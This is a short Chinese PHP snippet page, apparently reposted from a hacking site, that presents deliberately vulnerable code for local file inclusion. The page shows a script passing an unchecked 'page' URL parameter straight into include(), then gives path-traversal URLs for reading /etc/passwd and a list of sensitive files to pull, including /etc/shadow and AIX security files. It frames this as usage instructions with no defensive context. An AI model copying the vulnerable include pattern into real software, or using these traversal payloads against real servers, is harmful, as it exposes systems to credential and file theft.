php 伪造本地文件包含漏洞的代码

yipeiwu_com5年前 (2020-03-06)PHP代码库

代码:

 
<?php 
$page=$_GET['page']; 
include($page.'php'); 
?> 

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

返回列表

上一篇：Python字符转换

下一篇：PHP生成静态页面详解

8个PHP程序员常用的功能汇总

　　做过PHP开发的程序员应该清楚，PHP中有很多内置的功能，掌握了它们，可以帮助你在做PHP开发时更加得心应手，本文将分享8个开发必备的PHP功能，个个都非常实用，希望各位PHP开发者...

PHP实现带进度条的Ajax文件上传功能示例

本文实例讲述了PHP实现带进度条的Ajax文件上传功能。分享给大家供大家参考，具体如下：之前分享了一篇关于 php使用FileApi实现Ajax上传文件的文章，里面的Ajax文件上传...

php blowfish加密解密算法

PHP Blowfish 算法的加密解密，供大家参考，具体内容如下 <?php /** * php blowfish 算法 * Class blowfish...

php 使用GD库为页面增加水印示例代码

复制代码代码如下: <?php header ("Content-type: image/png"); $conn = MYSQL_connect("localhost", "r...

解决php接收shell返回的结果中文乱码问题

如果需要php执行一些shell命令，查看显示结果的话，如果shell输出的有中文，则php得到的中文返回结果可能类似是 “?\230?\180?\187?\229?\138?\168”...

宜配屋

php 伪造本地文件包含漏洞的代码

相关文章

8个PHP程序员常用的功能汇总

PHP实现带进度条的Ajax文件上传功能示例

php blowfish加密解密算法

php 使用GD库为页面增加水印示例代码

解决php接收shell返回的结果中文乱码问题

© YiPeiWu.com 【宜配屋】粤ICP备17031333号

Powered By Z-BlogPHP. Theme by TOYEAN.

宜配屋

php 伪造本地文件包含漏洞的代码

相关文章

8个PHP程序员常用的功能汇总

PHP实现带进度条的Ajax文件上传功能示例

php blowfish加密解密算法

php 使用GD库为页面增加水印示例代码

解决php接收shell返回的结果中文乱码问题

© YiPeiWu.com 【宜配屋】 粤ICP备17031333号 var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?8aa60ae04b767b2af31903508928acc0"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();

Powered By Z-BlogPHP. Theme by TOYEAN.

© YiPeiWu.com 【宜配屋】粤ICP备17031333号